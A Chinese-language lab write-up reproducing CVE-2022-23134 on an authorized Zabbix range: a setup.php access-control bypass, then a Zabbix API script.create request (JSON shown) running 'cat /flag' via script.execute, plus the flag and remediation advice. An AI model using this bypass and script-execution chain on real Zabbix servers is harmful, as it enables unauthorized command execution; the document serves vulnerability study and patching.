春秋云镜靶场漏洞复现:CVE-2022-23134 Zabbix setup 绕过与 API 脚本执行
环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。
1. 基本信息
| 项目 | 内容 |
|---|---|
| CVE | CVE-2022-23134 |
| 产品 | Zabbix |
| 利用链 | setup 访问控制绕过 -> 管理端/API -> 创建服务器端脚本 |
| 执行内容 | cat /flag |
| Flag | flag{86763c33-e8cb-4ddf-b3e5-9d777152fb42} |
2. 原理与复现
安装向导/setup 状态处理不当导致未授权访问管理功能。进入管理端后,通过 Zabbix API 创建一个服务器端只读脚本,脚本内容为 cat /flag,再在主机上下文执行并读取结果。
代表性链路:
GET /zabbix/setup.php -> 绕过安装状态校验 -> 管理端/API
POST /api_jsonrpc.php -> script.create(command="cat /flag")
POST /api_jsonrpc.php -> script.execute -> 回显 Flag
API 请求示意:
{"jsonrpc":"2.0","method":"script.create","params":{"name":"read-flag","command":"cat /flag","type":0,"execute_on":0},"auth":"<token>"}
执行结果:
flag{86763c33-e8cb-4ddf-b3e5-9d777152fb42}
3. 修复建议与验证
升级 Zabbix,修正 setup 状态与认证边界;管理 API 强制认证授权,限制脚本创建/执行权限;Zabbix 进程使用最小 OS 权限。Flag 与平台记录一致,靶场已关闭。精确绕过路径、API 参数和 token 未保存,截图已保存到 images 目录并由平台详情页复核。
截图证据



浙公网安备 33010602011771号